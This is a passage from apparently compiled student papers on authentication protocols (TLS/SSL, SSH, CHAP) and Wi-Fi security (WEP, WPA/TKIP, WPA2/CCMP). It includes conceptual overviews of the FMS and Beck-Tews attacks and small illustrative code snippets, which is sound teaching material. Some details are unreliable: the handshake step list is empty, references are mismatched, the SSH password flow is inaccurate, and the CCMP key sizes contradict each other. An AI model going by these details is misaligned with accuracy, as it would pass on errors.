Lastly, this may probably be a limitation on desktop 183 environments and is not being able to query LDAP directories correctly. As a result, users may find that the GUI environments do not work properly as expected. 3.6 Transport Layer Security (TLS) and Secure Sockets Layer (SSL) 3.6.1 Introduction to TLS/SSL Transport Layer Security (TLS) and Secure Sockets Layer (SSL) are public key cryptographic protocols developed for securing web browser and communication sessions. They encrypt network connections by using a message authentication code keyed beforehand for message reliability and asymmetric cryptography for privacy reasons. TLS/SSL provides authentication of clients to server through the use of cryptography and authenticated digital certificates. The specification was designed to enable other application layer protocols such as LDAP, FTP and TELNET to use SSL for communications. TLS/SSL ensures strong authentication, message privacy and integrity to servers and clients. It is mainly used to prevent man-in-the-middle, replay attacks, masquerade attacks and etc [24]. It is mostly implemented on top of any Transport Layer protocols. 3.6.2 TLS/SSL from a Historical Perspective Secure Sockets Layer (SSL) was developed by Netscape in 1994 to secure transactions over the Internet. In early versions of SSL, SSL Version 1.0 was not released to the public. On February 1995, SSL Version 2.0 was released with some security flaws and SSL Version 3.0 came out in 1996 to replace SSL Version 2.0. On January 1999, TLS 1.0 (SSL 3.1) was released as an upgrade to SSL Version 3.0 and they are not interoperable. The parties are required to negotiate the same protocol for communication if the same protocol is not supported by the both of them. On April 2006, TLS 1.1 (SSL 3.2) was released with additional protection against Cipher Block Chaining (CBC) attacks. On August 2008, TLS 1.2 (SSL 3.3) was released with the additions of Advanced Encryption Standard Cipher Suites and TLS Extensions definition. It was further improved in March 2011 on its backward compatibility with SSL. TLS provides some additional security improvements as compared to SSL such as Key-Hashing for Message Authentication Code (HMAC), consistent certificate handling, specific alert messages and etc [25]. Due to the ease of deployment and usage, it became a popular authentication method used in Windows OS. It works with most web browsers and OS such as Windows and UNIX as well. 3.6.3 How does TLS/SSL work? The TLS/SSL protocol can be divided into two different layers. The first layer consists of the application protocol and Handshake Protocol, the Change Cipher Spec Protocol, and Alert Protocol. The second layer is the Record Protocol. The record protocol is responsible for controlling the flow of data between two end points of a session. Symmetric protocols such as Triple Data Encryption Standard (3DES) are used for encryption. The handshake protocol authenticates either one or both endpoints of session then establish a unique symmetric key to generate set of keys for encryption and decryption of data which is used only for the unique SSL session [25]. 184 Once the handshake is completed then the data traversing in application layer will flow encrypted across the unique SSL session. The digital certificate, issued by a Certificate Authority (CA) can be assigned to the applications using SSL or either of the endpoints [25]. I will briefly explain on the steps in SSL handshake: 1. 2. 3. 4. 5. 6. 
3.6.4 Limitations of TLS/SSL
TLS/SSL lacks support for UDP traffic because it requires a stateful connection. Also, not all setups implement both server and client authentication. Lastly, using TLS/SSL in tunnel mode can be expensive if the setup requires an external certification authority to sign the digital certificates [26].

3.7 Secure Shell (SSH)

3.7.1 Introduction to SSH
SSH uses various methods to authenticate a remote user attempting to connect to a particular host, and works at the application layer of the OSI model. Rather than transmitting the user's password in plaintext across the channel, as applications such as Telnet do, the connecting computer uses the host's public key to encrypt the password, making the transmission much safer. SSH exchanges public keys during the authentication process to ensure that the password is encrypted, so that even if a man-in-the-middle or password sniffer gets hold of the encrypted text, he or she cannot feasibly recover the plaintext without the intended recipient's private key.

3.7.2 SSH from a Historical Perspective
SSH first appeared on the market in 1995. It was developed by a researcher at the Helsinki University of Technology in Finland, which had been a regular victim of password-sniffing attacks in early 1995; the researcher produced SSH for the university's own use. During SSH's beta phase, it gained so much publicity and attention that it became clear SSH could be a commercial product. In July 1995, SSH-1 was released with its source code made available to the public, allowing anyone to use and edit it freely. At the end of 1995, prompted by the mass of support e-mail he received, the researcher set up a company, SSH Communications Security (SCS), to continue developing the SSH product. However, as SSH-1's popularity skyrocketed, numerous problems and limitations were discovered that could not be fixed without losing backward compatibility. This triggered the birth of SSH-2 in 1996, which uses new algorithms and is not compatible with SSH-1. In February 1997, an Internet draft was submitted for the SSH-2 protocol, and in 1998 SSH-2 was released by SCS. SSH-2 did not replace SSH-1, however, for two reasons: SSH-2 lacked some useful, practical features of SSH-1, and SSH-2 was not free to use except for qualifying educational institutions and non-profit organizations. Even three years after its release, SSH-2's popularity had not overtaken SSH-1's, despite SSH-2 providing a much more secure protocol [27].
3.7.3 Public key authentication over SSH
This method uses public key infrastructure techniques to authenticate the user. The authentication process requires the server to know in advance the details of the key the user intends to use. Once the user has chosen a public key, it is transmitted to the server, which checks whether that key is in the permitted list. If not, authentication fails and the connection is refused. Otherwise, the server uses the chosen public key to encrypt a randomly generated 256-bit string and sends it back to the user as a challenge text [28]. On receiving the challenge, the user decrypts it with the corresponding private key. The decrypted challenge is then combined with the session identifier and fed to an MD5 function to generate a hash value, which must be sent back to the server. If this hash matches the value the server has calculated itself, authentication succeeds.
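Sketched with the third-party Python paramiko library, a public-key login looks roughly like this. The host and key path are hypothetical, and the server must already hold the matching public key for the account.

    import paramiko  # pip install paramiko

    client = paramiko.SSHClient()
    # Trust decisions normally come from a known_hosts file; this policy
    # auto-accepts unknown host keys and is for illustration only.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    client.connect("sunfire.comp.nus.edu.sg", username="alice",
                   key_filename="/home/alice/.ssh/id_rsa")

    stdin, stdout, stderr = client.exec_command("hostname")
    print(stdout.read().decode())
    client.close()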
3.7.4 Rhost authentication
This method authenticates the machine rather than the user. A user on the client machine may wish to access an account available on the server. The SSH client first requests a connection to the server, and the server uses DNS to look up the hostname for the client's source IP address. The server then authenticates the machine with two tests. The first test checks that the client machine is listed as a trusted machine under the authorization rules; if it is found, authentication continues, otherwise it is aborted and fails. The second test requires the server to check that the client is running a trusted program installed by the client machine's system administrator. The server verifies this rule by making sure the client connection uses a privileged port (1-1023): since the client machine can only use this range of ports with superuser privileges, this proves and satisfies the second rule [28]. Once the two rules have passed, the server verifies that the client has permission to access the particular account the client user wants [28]. Of all the available authentication methods, this is the weakest, because it checks only the client host address [29]. In a modern network, IP addresses can be spoofed easily, DNS can be poisoned, and users are often given superuser privileges that let them use any privileged port freely.

3.7.5 Password authentication over SSH
Password authentication over an SSH channel is considered the last resort, used when other authentication methods have failed [30]. It is accompanied by the concepts of Public Key Infrastructure to ensure that the transmitted password is encrypted and safe from man-in-the-middle attacks. The following is a simple illustration of how SSH authentication works in the password model, in which Alice is trying to connect to a server at sunfire.comp.nus.edu.sg:

1. Alice keys in the host address "sunfire.comp.nus.edu.sg", the port number, her username and her password.
2. sunfire.comp.nus.edu.sg acknowledges the request and sends its own public key to Alice.
3. Alice looks into her list of trusted public keys and searches for the key of sunfire.comp.nus.edu.sg.
   3a. If the key is not found, SSH prompts Alice on whether she wants to add the key from sunfire.comp.nus.edu.sg to her trusted list.
   3b. If a matching public key is found in Alice's trusted list, she proceeds to step 4.
4. Alice uses that public key from Sunfire to encrypt all her authentication details, including the username and password. At the same time, Alice's computer sends a copy of her own public key to the Sunfire host.
5. Once Sunfire receives the encrypted authentication details and Alice's public key, it decrypts the authentication details with its own private key and proceeds to check the username and password against its own database.

3.7.6 Host-based authentication over SSH-2
The SSH-2 protocol removed SSH-1's Rhost authentication because of its insecurity, but embeds another authentication method known as "host-based" authentication [30]. Host-based authentication uses the client hostname instead of the client IP address, which eliminates the issues of clients with dynamic IP addresses, clients behind a proxy, and clients with more than one IP address. The authentication process involves two identifiers, Nnet and Nauth: Nnet refers to the client name in the authentication request, and Nauth refers to the name obtained by looking up the client's network address. If the two identifiers do not match, authentication fails [30].

3.8 Challenge Handshake Authentication Protocol (CHAP)

3.8.1 Introduction to CHAP
The Challenge Handshake Authentication Protocol (CHAP) is a three-way challenge-response handshake used periodically to verify that the identity of a peer is still valid [31]. It uses the Message Digest 5 (MD5) hashing scheme to compute the responses and is used by various network access servers and client vendors. Remote access clients that use CHAP can be authenticated by any server running Routing and Remote Access with CHAP support, because CHAP requires the use of reversibly encrypted passwords [32]. The CHAP challenge and response process [31] is as follows, with a worked sketch of the response computation after the list:

1. After a link has been established, the authenticator sends a "challenge" message to the peer.
2. The peer uses a one-way hash function to calculate a value, which is sent back to the authenticator.
3. The authenticator compares the received value against its own calculation of the expected hash value; the peer is acknowledged as authenticated if the values match, otherwise the connection should be terminated.
4. The authenticator periodically sends a new challenge to the peer at random intervals, repeating steps 1 to 3 for every challenge.
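The response computation itself is small enough to show in full. RFC 1994 defines it as the MD5 hash of the Identifier, the shared secret and the challenge, concatenated in that order; the secret and identifier below are placeholders.

    import hashlib, os

    def chap_response(identifier, secret, challenge):
        # RFC 1994: Response = MD5(Identifier || secret || Challenge)
        return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

    secret = b"shared-secret"     # known to both peer and authenticator
    challenge = os.urandom(16)    # sent by the authenticator
    ident = 1                     # identifier from the Challenge packet

    peer_value = chap_response(ident, secret, challenge)
    authenticator_value = chap_response(ident, secret, challenge)
    assert peer_value == authenticator_value   # SUCCESS is sent on a match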
3.8.2 CHAP from a Historical Perspective
The development of CHAP is dated to 1996, as defined in RFC 1994 [33]. Microsoft's renditions, MS-CHAPv1 and MS-CHAPv2, are likewise dated to 1998 (RFC 2433) [34] and 2000 (RFC 2759) [35] respectively. Microsoft's versions were extensions of and improvements to the original CHAP. Microsoft Challenge Handshake Authentication Protocol version 1 is an encrypted password authentication protocol that is not reversible [36], while version 2 provides stronger security for remote access connections than version 1 [37]. A general description of the differences between the MS-CHAPv1 and MS-CHAPv2 processes [38] is shown below:

MS-CHAP version 1:
- Begins CHAP with the algorithm value 0x80.
- The server sends an 8-byte challenge.
- The client sends a 24-byte LAN Manager response and a 24-byte NT response to the 8-byte challenge.
- The server sends a SUCCESS or FAILURE response.
- Based on the SUCCESS or FAILURE response, the client decides whether to continue with the connection.

MS-CHAP version 2:
- Begins CHAP with the algorithm value 0x81.
- The server sends a 16-byte challenge, which the client uses (together with a 16-byte peer challenge) to create a hidden 8-byte challenge value.
- The client sends the 16-byte peer challenge it used to create the hidden 8-byte challenge, together with the 24-byte NT response.
- The server sends a SUCCESS or FAILURE response and piggybacks an Authenticator Response to the 16-byte peer challenge.
- Based on the SUCCESS or FAILURE response, the client decides whether to continue with the connection; additionally, if the Authenticator Response is not valid when the client checks it, the connection is disconnected.

4 Conclusions
In conclusion, authentication methods are needed everywhere in our daily lives to authenticate different users and systems, and the methods explored above remain ubiquitous even today. We have seen how authentication methods evolved over the years in terms of improvements in authenticating different users and systems. We have now reached an age of exponentially multiplying services and increasingly complex processes, so it is essential to implement newer authentication methods and security measures, using new sets of sophisticated algorithms, to safeguard against unauthorized access and potential attacks. While implementing newer authentication methods, it is important to ensure that sensitive data are neither lost nor visible to unauthorized people, and that the trustworthiness of the data is maintained.

References
1. About Passwords, http://media.techtarget.com/searchSecurity/downloads/HackingforDummiesCh07.pdf
2. The History of Passwords, http://www.onlinepasswordgenerator.net/the-history-of-passwords.php
3. Introduction and Background of PKI, http://www.pdfsearchbox.com/The-Alliance-PKI-Initiative.html
4. Public Key Infrastructure Details, http://searchsecurity.techtarget.com/definition/PKI
5. History of PKI, www.saylor.org/site/wp-content/.../03/Public-key-infrastructure.pdf
6. Public Key Cryptography (PKC) History, http://www.livinginternet.com/i/is_crypt_pkc_inv.htm
7. SANS Information on Authentication, http://www.sans.org/reading_room/whitepapers/authentication/overview-authentication-methods-protocols_118
8. Kerberos Overview: An Authentication Service for Open Network Systems, http://www.cisco.com/en/US/tech/tk59/technologies_white_paper09186a00800941b2.shtml
9. Frequently Asked Questions about the MIT Kerberos Consortium, http://www.kerberos.org/about/FAQ.html
10. Kerberos Authentication History, http://www.theworldjournal.com/special/nettech/news/kerberos.htm
11. Sharing a Secret: How Kerberos Works, http://www.computerworld.com/computerworld/records/images/pdf/kerberos_chart.pdf
12. Kerberos Authentication Protocol, http://www.zeroshell.net/eng/kerberos/Kerberos-definitions/#1.3.8
13. Risk Assessment of Authentication Protocol: Kerberos, http://www.scribd.com/doc/59497058/Risk-Assessment-of-Authentication-Protocol-Kerberos
14. Protect Yourself against Kerberos Attacks, http://oreilly.com/pub/a/windows/excerpt/swarrior_ch14/index1.html
15. The NTLM Authentication Protocol and Security Support Provider, http://davenport.sourceforge.net/ntlm.html
16. Microsoft NTLM, http://msdn.microsoft.com/en-us/library/aa378749%28VS.85%29.aspx
17. NTLM, http://www.webopedia.com/TERM/N/NTLM.html
18. Protect against Weak Authentication Protocols and Passwords, http://www.windowsecurity.com/articles/Protect-Weak-Authentication-Protocols-Passwords.html
19. Authentication Types, http://www.tech-faq.com/authentication-types.html
20. Understanding NTLM, http://cybernicsecurity.com/index.php/authentication/4-understanding-ntlm-
21. Windows Server TechCenter, http://technet.microsoft.com/en-us/library/cc784450(WS.10).aspx
22. iSeries Information Center V5R3, http://publib.boulder.ibm.com/infocenter/iseries/v5r3/index.jsp?topic=%2Frzain%2Frzainhistory.htm
23. Limitations and Differences between TLS/SSL as VPN Solution, http://olemartin.com/projects/VPNsolutions.pdf
24. Managing Identity Information between LDAP Directories and Exchange Server 2010, http://allcomputers.us/windows_server/managing-identity-information-between-ldap-directories-and-exchange-server-2010.aspx
25. Authentication Using LDAP, http://tldp.org/HOWTO/LDAP-HOWTO/authentication.html
26. Windows IT Pro, LDAP Limitations, http://www.windowsitpro.com/article/ldap/ldap-limitations
27. O'Reilly Definitive Guide on History of SSH, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch01_05.htm
28. O'Reilly Definitive Guide on SSH-1, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_04.htm
29. O'Reilly Definitive Guide on SSH-2, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_05.htm#ch03-80181
30. Types of SSH Authentication, http://www.psc.edu/general/net/ssh/authentication.php
31. Challenge Handshake Authentication Protocol for PPP, http://www.javvin.com/protocolCHAP.html
32. Microsoft TechNet: Windows Server TechCenter Library, http://technet.microsoft.com/en-us/library/cc757631(WS.10).aspx
33. PPP Challenge Handshake Authentication Protocol, http://tools.ietf.org/html/rfc1994
34. MS PPP CHAP Version 1 History, http://tools.ietf.org/html/rfc2433
35. MS PPP CHAP Version 2 History, http://tools.ietf.org/html/rfc2759
36. Microsoft TechNet, MS-CHAPv1 Definition, http://technet.microsoft.com/en-us/library/cc758984(WS.10).aspx
37. Microsoft TechNet, MS-CHAPv2 Definition, http://technet.microsoft.com/en-us/library/cc739678(WS.10).aspx
38. Cryptanalysis of Microsoft's PPTP Authentication Extensions (MS-CHAPv2), http://www.schneier.com/paper-pptpv2.html

Different strategies used for securing IEEE 802.11 systems; the strengths and the weaknesses

Cheng Chang, Yu Gao
National University of Singapore

Abstract. Different wireless security protocols have been used over time to establish secured wireless networks. With an understanding of the underlying mechanism of each protocol, we cross-compare the protocols with each other to reach a final evaluation of each individual protocol; in this way, both strengths and weaknesses can be shown clearly. As the history of these protocols shows, some are modifications of previous ones, while others use completely new ideas to achieve a new standard of security. All of the above is discussed in detail in the following paper.

Keywords: wireless, security, WEP, WPA

1 Introduction
The invention of wireless networking makes it possible for remote users to access the Internet everywhere, and the convenience of such access caused a dramatic shift in the development of the laptop. However, the chance of traffic being intercepted while surfing the Internet is much higher than on a wired connection, so a new secured network protocol was essential. In the following paper, these protocols and the underlying mechanisms that help make the connection more secure are discussed in detail. At the same time, the strengths and weaknesses are evaluated through comparisons between the protocols, based on the underlying structures, techniques and methodologies each individual protocol uses.

2 Wired Equivalent Privacy (WEP)
After the emergence of IEEE 802.11, wireless networks were not secured until the first widely deployed protection method arrived in 1999: Wired Equivalent Privacy. The intention of the WEP algorithm is to provide confidentiality and integrity to otherwise unsecured wireless networks.
[2] The algorithm is as follows: i := 0 j := 0 while GeneratingOutput: i := (i + 1) mod 256 j := (j + S[i]) mod 256 swap values of S[i] and S[j] K := S[(S[i] + S[j]) mod 256] 194 output K endwhile Integrity: Cyclic redundancy check (CRC) is an error-detecting code designed to detect accidental changes to raw computer data, and is commonly used in digital networks and storage devices such as hard disk drives. [3] Mechanism behind CRC-32 checksum: The data are checked with a fix length depending on the length of the divisor that is selected. Append a number of bits that is one bit less than the length of the divisor to the original data. With the left most 1 as the start point, perform a long division algorithm. Divide the data after appended until it the original part is fully divided. Record the remainder of the long division and append this value to the original data as the checked data. For example: 00011010101110 000 1001 00001000101110 000 1001 00000001101110 000 1001 00000000100110 000 1001 00000000000010 000 10 01 ----------------00000000000000 010 <--<--<--<--- input left shifted by 3 divisor result divisor... <---remainder (3 bits) In this way, the new checked data of “00011010101110” becomes longer, which is “00011010101110 010”. The last three bit is the check sum. In the receiver side, they will also check it with the divisor 1001. For example: 195 00011010101110 010 bits 1001 00001000101110 010 1001 00000001101110 010 1001 00000000100110 010 1001 00000000000010 010 10 01 ----------------00000000000000 000 <--- input left shifted by 3 <--- divisor <--- result <--- divisor... <---remainder (3 bits) When the reminder becomes 0 in the receiver side, it means there is no error during transmission. 2.2 Authentication Details: Open system: In Open System authentication, the client of the WLAN does not need to give his/her passwords and username to the Access Point. As a result, all clients are able to access to the Access Point without any authentication. While the user access to the Access Point, authentication occurs. Users have to enter the corresponding username and password into the system in order to use the Access Point. Shared key: In Shared Key authentication, authentication takes place in form of question and answers between server and client: 1. The client sends an authentication request to the Access Point. 2. The Access Point replies with a question. 3. The client encrypts the question with the configured WEP key, and sends it back in another authentication request. 196 4. The Access Point decrypts the answer. If it matches the question, the Access Point admits the connection and sends back a positive reply. After the connection established, the pre-shared WEP key is also used for encrypting the data frames using RC4. [4] 2.3 Evaluation: Strength: Major strength: 1. Previously, stream ciphers use linear feedback shift registers (LFSRs). Since these registers are only efficient in the hardware part, the performance in software section is not good enough. In contrast, the CR4 does not use LFSRs. With simple byte manipulations, it provides good performance in the software section. It uses 256 bytes of memory for the state array and k bytes for the key. It use a bitwise AND operation with 255 to replace the original modular reduction of some value modulo 256. [5] 2. Since RC4 is a stream cipher, it is better than the block cipher in terms of preventing the BEAST attack on TLS 1.0. This is an important advantage due to the methodology itself. 
For block cipher, since it is implemented with fix length encryption, it is easy for the BEAST to accommodate and steal the user information.[6] Other strength: 1. The use of cyclic redundancy check is a cheap-to-implement and accurate implementation. It can be easily implemented at the hardware level. Just by simple bits manipulation, it can record the necessary data for error detection, for example, to detect the error in noise channels. Weakness: Major flaws: • RC4 does not take a separate nonce alongside the key. If multiple streams are encrypted, the key shall be combined together with a specific 197 algorithm. However, RC4 normally does not have such an algorithm, it just simply append the initialization vector to the key. Thus, by using the keys of WEP concatenated with a 24-bit initialization vector (IV) as the key for the RC4, it is not secure enough. At the same time, since the 24-bit IV is fixed, which is too short, it is easy for the hackers to attack it. [7] • Since RC4 is a stream cipher, the traffic keys are not supposed to be used repeatedly. The use of IV is just to prevent the key to be duplicated. However, the IV is not long enough. In a busy network, it is highly possible that the same traffic key appear repeatedly. For a 24-bit IV, there is a 50% probability the same IV will appear after each 5000 packets. • In addition, because RC4 is a stream cipher, it is more malleable than common block ciphers. It is vulnerable to a bit-flipping attack if it is not used together with a strong message authentication code. Actual events: In August 2001, Scott Fluhrer, Itsik Mantin, and Adi Shamir (FMS) published a cryptanalysis of WEP that exploits the way the RC4 cipher and IV is used in WEP, resulting in a passive attack that can recover the RC4 key after eavesdropping on the network. Depending on the amount of network traffic, and thus the number of packets available for inspection, a successful key recovery could take as little as one minute. If an insufficient number of packets are being sent, there are ways for an attacker to send packets on the network and thereby stimulate reply packets which can then be inspected to find the key. The attack was soon implemented, and automated tools have since been released. It is possible to perform the attack with a personal computer, off-the-shelf hardware and freely available software such as aircrack-ng to crack any WEP key in minutes. [8] FMS attack algorithm overview: Step 1: Start of KSA and IV is sent in clear text K = IV|K-WEP. Step 2: 198 Discover weak IVs such that KSA is resolved and output leaks information about the key itself. With every weak IV found, guess 1 byte of K. The average is 60 guesses per byte needed for recovering K. Step 3: When trying to recover K [A]: SI[1] < I and SI[1] + SI[SI[1]] = I + A After I steps results in resolved condition after I + A steps with high probability. Weak IV: (A+3, n-1, X). [8] Other Flaws. • In Generate RC4 keys: The number of keys used for WEP is not long enough, for example WEP-40 with key length 40. In addition, these keys are normally used in terms of ASCII code, which has less number of variations. Only a small percent of the 40 bit number have an ASCII representation. This makes the WEP more unsecure. • In cyclic redundancy check: This algorithm is specifically designed to check the normal types of errors occurred during communication channels. It itself is efficient, simple and accurate. 
However, when there is an attack intentionally, the algorithm does not protect the user from the attackers. It is easy to manipulate the data such that they have the same cyclic redundancy check values or to recalculate the check value to match the corrupted data frames. [9] • In authentication phase: The share-key authentication is less secure than the open system. Even though it provides the identification check as long as the client wants to connect with the Access Point, the key streams may be easily captured by the third party during this handshake process. As a result, it is better to use 199 open authentication rather than the share-key authentication although the open system authentication is also a weak authentication method. 2.4 Minor Modifications WEP2: Due the fact that the initialization vector is so short that is it easier to launch a stream cipher attack, WEP2 extended both the length of the IV key and the key of itself to 128 bits, compared to 24 bits and 40 bits in the previous version of WEP. In this way, the extended keys make a longer key for RC4. [10] In so doing, the WEP2 helps to eliminate the duplicate IV deficiency and stop brute force key attack to some extent. At the same time, since the keys become longer, the amount of possible ASCII combinations are also become more. However, just as the previous version, the ASCII combinations are still a small fraction of the bit combination of the key. Lots of them are wasted in this way. WEP+: Some of the plaintext initialization vectors statistically lead the pre-shared keys. They IVs are referred to the weak IVs. WEP+ filters out the weak IVs so that there are no more weak IVs that can be used by the attackers to crack the WEP+. [11] However, this implementation works only when both the ends of the wireless connection. This can hardly be enforced. At the same time, the WEP+ only solves this particular statistical flaw in the encryption process. Other statistical flaws still exist with WEP+. 3 Wi-Fi Protected Access (WPA) Since the Wired Equivalent Privacy (WEP) has various serious weaknesses [12], the Wi-Fi Alliance designed security certification programs and two security protocols to replace the older security algorithm, Wired Equivalent 200 Privacy (WEP), used for IEEE 802.11 wireless networks. The first security protocol, Wi-Fi Protected Access (WPA), was intended as an intermediate measure to replace the WEP. WPA has implemented the majority of the IEEE802.11i standard. The Temporal Key Integrity Protocol (TKIP) is also included in WPA to replace the old 40-bit or 128-bit encryption key which used in WEP that must be manually entered on wireless access points and devices and does not change [13]. 3.1 Temporal Key Integrity Protocol (TKIP) Background: As a security protocol used in the IEEE 802.11 wireless networking standard, TKIP is designed by the IEEE802.11i task group and Wi-Fi Alliance as a solution to replace WEP without upgrading of the legacy hardware are left by the Wi-Fi networks without viable link-layer security [14]. Mechanisms: TKIP and the related WPA standard, implement three new security features to address security problems encountered in WEP protected networks: • Firstly, a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 initialization is implemented in the TKIP. 
3 Wi-Fi Protected Access (WPA)
Since Wired Equivalent Privacy (WEP) has various serious weaknesses [12], the Wi-Fi Alliance designed security certification programs and two security protocols to replace the older security algorithm used for IEEE 802.11 wireless networks. The first security protocol, Wi-Fi Protected Access (WPA), was intended as an intermediate measure to replace WEP. WPA implements the majority of the IEEE 802.11i standard and includes the Temporal Key Integrity Protocol (TKIP) to replace the old 40-bit or 128-bit WEP encryption key, which had to be entered manually on wireless access points and devices and never changed [13].

3.1 Temporal Key Integrity Protocol (TKIP)
Background: TKIP is a security protocol used in the IEEE 802.11 wireless networking standard, designed by the IEEE 802.11i task group and the Wi-Fi Alliance as a replacement for WEP that would not require upgrading the legacy hardware left in Wi-Fi networks without viable link-layer security [14].

Mechanisms: TKIP and the related WPA standard implement three new security features to address the security problems encountered in WEP-protected networks:
• Firstly, TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing the result to the RC4 initialization. WEP, in comparison, merely concatenated the initialization vector with the root key and passed this value to the RC4 routine, which permitted the vast majority of the RC4-based WEP related-key attacks [15].
• Secondly, a sequence counter protects against replay attacks: the access point rejects packets that are received out of order.
• Finally, TKIP implements a 64-bit Message Integrity Check (MIC) [16].
TKIP uses RC4 as its cipher in order to be able to run on legacy WEP hardware with minor upgrades. It also provides a rekeying mechanism and ensures that every data packet is sent with a unique encryption key.

3.2 Message Integrity Check:
• In order to prevent an attacker from capturing, altering and/or resending data packets, a message integrity check (MIC) is included in WPA.
• The MIC replaces the cyclic redundancy check (CRC) of the WEP standard, and it provides a stronger data integrity guarantee for the handled packets than the CRC's Integrity Check Value (ICV) [17].
• The MIC, also known by the term message authentication code (MAC), is the information used to authenticate a message [18].
• A MIC (or keyed hash) algorithm takes a secret key together with an arbitrary-length message for the purpose of authentication. This protects the integrity and authenticity of the message's data by allowing verifiers to detect any changes to the message content.
• Cryptographic primitives such as cryptographic hash functions or block cipher algorithms can be used to construct MIC or MAC algorithms. However, many of the fastest MAC algorithms, such as UMAC and VMAC, are constructed from universal hashing [19].

MAC Example: In this example, the sender of a message runs it through a MAC algorithm to produce a MAC data tag. The message and the MAC tag are then sent to the receiver. The receiver in turn runs the message portion of the transmission through the same MAC algorithm using the same key, producing a second MAC data tag, and compares the tag received in the transmission with the one just generated. If they are identical, the receiver can safely assume that the integrity of the message was not compromised and that the message was not altered or tampered with during transmission [20].
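The exchange just described fits in a few lines of Python using the standard hmac module. HMAC-SHA-256 here merely stands in for whichever keyed hash a given protocol actually mandates, and the key and message are invented:

```python
import hashlib
import hmac

key = b"shared-secret-key"                 # known only to sender and receiver

def mac_tag(message: bytes) -> bytes:
    """Compute the MAC tag of a message under the shared key."""
    return hmac.new(key, message, hashlib.sha256).digest()

# The sender transmits (message, tag); the receiver recomputes and compares.
message = b"rekey at frame 4096"
tag = mac_tag(message)

# compare_digest avoids leaking information through timing differences.
assert hmac.compare_digest(mac_tag(message), tag)              # genuine
assert not hmac.compare_digest(mac_tag(message + b"!"), tag)   # tampered
```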
3.3 Strengths:
• With the new features implemented in TKIP, WPA is more secure than WEP: the key mixing inside TKIP increases the complexity of recovering the keys by giving an attacker substantially less data encrypted under any one key. As such, the WEP key recovery attacks have been eliminated.
• Many existing attacks are discouraged by the message integrity check (MIC), broadcast key rotation, per-packet key hashing and the sequence counter. TKIP thus raises the difficulty of many attacks, making WPA-protected wireless networks more secure than WEP-protected ones.

3.4 Weaknesses:
Since TKIP uses the same underlying mechanism as WEP, it is consequently vulnerable to a number of similar attacks. Furthermore, weaknesses in some of the protocol's additions have led to new attacks, including the Beck-Tews attack and the Ohigashi-Morii attack.

Beck-Tews attack:
─ The Beck-Tews attack is a key-stream recovery attack that, if successfully executed, permits an attacker to transmit 7-15 packets of the attacker's choice on the network [21].
─ It is an extension of the WEP chop-chop attack: the attacker guesses individual bytes of a packet, and each correct guess is confirmed by the wireless access point, allowing the attacker to go on guessing the remaining bytes of the packet.
─ In addition, the attack is able to evade the countermeasures of the checksum mechanism and the message integrity check (MIC), so the attacker gains access to the packet's key stream and the session's MIC code.
─ The attack can also circumvent WPA's replay protection by abusing the Quality of Service (QoS) channels.
─ As such, it enables ARP poisoning attacks, denial of service, and other similar attacks.
e.g. In October 2009, Halvorsen and others made further progress, enabling attackers to inject a larger malicious packet (596 bytes, to be specific) within 18 minutes and 25 seconds [22].

Ohigashi-Morii attack:
• Japanese researchers Toshihiro Ohigashi and Masakatu Morii reported an attack built on the Beck-Tews attack [23].
• The Ohigashi-Morii attack uses a similar method but adds a man-in-the-middle attack, and it does not require the vulnerable access point to have Quality of Service (QoS) enabled.

4 Wi-Fi Protected Access II (WPA2)
WPA2, also known as IEEE 802.11i-2004, is the successor of WPA. It replaces WPA, which was itself an intermediate solution for the old WEP protocol. WPA2 implements all the mandatory elements of IEEE 802.11i, and a new Advanced Encryption Standard (AES)-based encryption mode, CCMP, replaces WPA's TKIP in order to provide additional security [24].

5 Counter Mode with Cipher Block Chaining Message Authentication Code Protocol, or CCMP (CCM mode Protocol)
5.1 Background
• CCMP is an encryption protocol designed for wireless LAN products that implements the IEEE 802.11i amendment to the original IEEE 802.11 standard.
• CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM) of the AES standard [25].
• As the successor to TKIP, CCMP was created to handle TKIP's vulnerabilities and make wireless networks more secure [25].

5.2 Mechanisms:
• For data confidentiality CCMP uses CCM's counter (CTR) mode, while for authentication and integrity it uses CCM's CBC-MAC.
• CCM protects both the MPDU data field and selected portions of the IEEE 802.11 Medium Access Control Protocol Data Unit (MPDU) header.
• CCMP is based on AES processing with a 128-bit key and a 128-bit block size, and uses CCM with the following two parameters (see the sketch after this section):
─ M = 8, indicating that the MIC is 8 octets;
─ L = 2, indicating that the Length field is 2 octets [26].
• A CCMP MPDU includes five sections:
─ the MAC header, which contains the destination and source address of the data packet;
─ the CCMP header, composed of 8 octets, consisting of the packet number (PN), the Ext IV, and the key ID (CCMP uses the PN, Ext IV and key ID values to encrypt the data unit and the MIC);
─ the data unit, which is the data being sent in the packet;
─ the Message Integrity Code (MIC), which protects the integrity and authenticity of the packet; and
─ the frame check sequence (FCS), which is used for error detection and correction [25].
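The parameters above (M = 8 gives an 8-octet MIC; L = 2 implies a 15 - 2 = 13-octet nonce) can be exercised with the AES-CCM primitive from the third-party pyca/cryptography package. This is a hedged sketch of CCM itself, not of the exact 802.11 frame construction; the key, nonce and header bytes are placeholders:

```python
# Requires the third-party "cryptography" package (pip install cryptography).
import os
from cryptography.hazmat.primitives.ciphers.aead import AESCCM

key = AESCCM.generate_key(bit_length=128)   # CCMP uses AES with a 128-bit key
ccm = AESCCM(key, tag_length=8)             # M = 8: the MIC is 8 octets

nonce = os.urandom(13)                      # L = 2 leaves 15 - 2 = 13 nonce octets
header = b"placeholder MPDU header fields"  # authenticated but not encrypted
payload = b"data unit being sent in the packet"

ciphertext = ccm.encrypt(nonce, payload, header)   # payload plus 8-octet MIC
assert ccm.decrypt(nonce, ciphertext, header) == payload
```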
5.3 Strengths:
• As the standard encryption protocol of the WPA2 standard, CCMP is much more secure than WPA's TKIP protocol and the WEP protocol.
• For data confidentiality, CCMP ensures that only authorized parties can access the information [16].
• For authentication, CCMP provides proof of the genuineness of the user [27].
• CCMP also provides access control in conjunction with layer management [27].
• Thanks to its block cipher mode, CCMP is claimed secure against attacks of up to 2^128 steps of operation if the encryption key is 256 bits or larger.
